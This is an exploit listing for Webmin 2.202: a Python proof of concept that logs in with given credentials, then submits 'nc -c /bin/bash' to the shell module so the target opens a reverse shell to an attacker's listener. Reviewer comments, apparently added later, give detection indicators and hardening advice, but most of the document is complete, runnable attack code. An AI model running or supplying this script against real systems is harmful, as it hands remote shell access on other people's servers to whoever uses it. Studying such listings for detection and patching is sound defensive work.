Webmin RCE Leading to Privilege Escalation

2025.03.05
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Webmin RCE Leading to Privilege Escalation
# Google Dork: N/A
# Date: 05-03-2025
# Exploit Author: Buğra Enis Dönmez
# Vendor Homepage: https://webmin.com/
# Software Link: https://webmin.com/
# Version: 2.202
# Tested on: Windows

# Python POC
#
# Reviewer notes (defensive reading of this listing):
# - Precondition: the script logs in with a supplied username and password
#   before it contacts the shell endpoint, so what it demonstrates is command
#   execution by an already-authenticated account. The listing carries no CVE
#   or CWE. NOTE(review): whether this exceeds the account's intended rights
#   depends on which Webmin modules that account is allowed to use - confirm
#   against the module ACL of the tested installation.
# - NOTE(review): "Tested on: Windows" presumably describes the machine the
#   script was run from; the command string and the /root working directory
#   used below are Unix-specific.
# - Observable sequence for detection: a POST to /session_login.cgi answered
#   with 302 and a Set-Cookie containing "sid=", followed by a POST to
#   /shell/index.cgi carrying the form fields "cmd", "pwd" and "history",
#   then an outbound connection started by nc from the Webmin host. The
#   User-Agent, Accept-Language and multipart boundary are hard-coded
#   constants, so they are weak indicators that change with any edit.
# - Hardening that follows from the precondition: limit the command shell
#   module to the accounts that need it, restrict which addresses may reach
#   the Webmin port, and use strong or two-factor authentication for Webmin
#   logins.

import requests
import argparse
import sys
import time

def main():
    """Log in to a Webmin instance and submit one command to its shell module.

    All inputs come from the command line: the Webmin host and port
    (-rhost, -rport), the account credentials (-u, -p) and the address and
    port (-lhost, -lport) that are interpolated into the submitted command.

    Exits with status 0 after the command request has been sent, and with
    status 1 when the login response is not a 302, when no "sid=" cookie is
    returned, or when an exception is raised while talking to the server.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-rhost", required=True, help="Target IP address")
    parser.add_argument("-rport", required=True, help="Target port")
    parser.add_argument("-u", required=True, help="Username")
    # The password is a command-line argument, so it is visible in the process
    # list and shell history of the machine running the script.
    parser.add_argument("-p", required=True, help="Password")
    parser.add_argument("-lhost", required=True, help="Listener IP address")
    parser.add_argument("-lport", required=True, help="Listener port")
    args = parser.parse_args()

    # Two endpoints are used: the session login CGI and the shell module CGI.
    login_url = f"https://{args.rhost}:{args.rport}/session_login.cgi"
    command_url = f"https://{args.rhost}:{args.rport}/shell/index.cgi"

    login_data = {
        "user": args.u,
        "pass": args.p
    }

    # Fixed browser-like headers. The initial Cookie value is a placeholder
    # ("sid=x") that is replaced once the server issues a real session id.
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
        "Referer": f"https:// {args.rhost}:{args.rport}/session_login.cgi?logout=1",
        "Origin": f"https://{args.rhost}:{args.rport}",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Cookie": "redirect=1; testing=1; sid=x"
    }

    session = requests.Session()

    try:
        print("Attempting to log in...")
        time.sleep(2)
        # verify=False turns off TLS certificate validation, so the credentials
        # are sent without confirming the identity of the server.
        # allow_redirects=False keeps the 302 response itself, whose
        # Set-Cookie header is read below.
        response = session.post(login_url, headers=headers, data=login_data, verify=False, allow_redirects=False)

        # A 302 is treated as a successful login.
        if response.status_code == 302:
            set_cookie_header = response.headers.get("Set-Cookie")
            if set_cookie_header and "sid=" in set_cookie_header:
                # Take the text between "sid=" and the next ";" as the session id.
                sid = set_cookie_header.split("sid=")[1].split(";")[0]
                print("Login successful!")
                time.sleep(2)
                headers["Cookie"] = f"redirect=1; testing=1; sid={sid}"
                print(f"Check your listener on {args.lhost}:{args.lport}")
                time.sleep(2)

                boundary = "---------------------------30454280098212925122759899223"
                # The command placed in the "cmd" field. It runs with whatever
                # privileges the shell module grants the logged-in account.
                payload = f"nc -c /bin/bash {args.lhost} {args.lport}"
                # Hand-built multipart body with three fields: the command,
                # a working directory of /root, and an empty history value.
                command_data = (
                    f"{boundary}\r\n"
                    f"Content-Disposition: form-data; name=\"cmd\"\r\n\r\n{payload}\r\n"
                    f"{boundary}\r\n"
                    f"Content-Disposition: form-data; name=\"pwd\"\r\n\r\n/root\r\n"
                    f"{boundary}\r\n"
                    f"Content-Disposition: form-data; name=\"history\"\r\n\r\n\r\n"
                    f"{boundary}--\r\n"
                )
                headers["Content-Type"] = f"multipart/form-data; boundary={boundary.strip('-')}"
                # The response is not inspected; the script exits 0 once the
                # request has been sent, whether or not the command ran.
                session.post(command_url, headers=headers, data=command_data, verify=False)
                sys.exit(0)
            else:
                print("Login failed: SID not found.")
                sys.exit(1)
        else:
            print("Login failed.")
            sys.exit(1)
    except requests.exceptions.RequestException as e:
        # The caught exception is not printed, so the cause of a network or
        # TLS failure is not shown to the operator.
        print("An error occurred during the request.")
        sys.exit(1)
    except Exception as e:
        print(f"An unexpected error occurred: {e}")
        sys.exit(1)

if __name__ == "__main__":
    # Silences the warning that requests would otherwise emit for every
    # verify=False call above.
    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
    main()

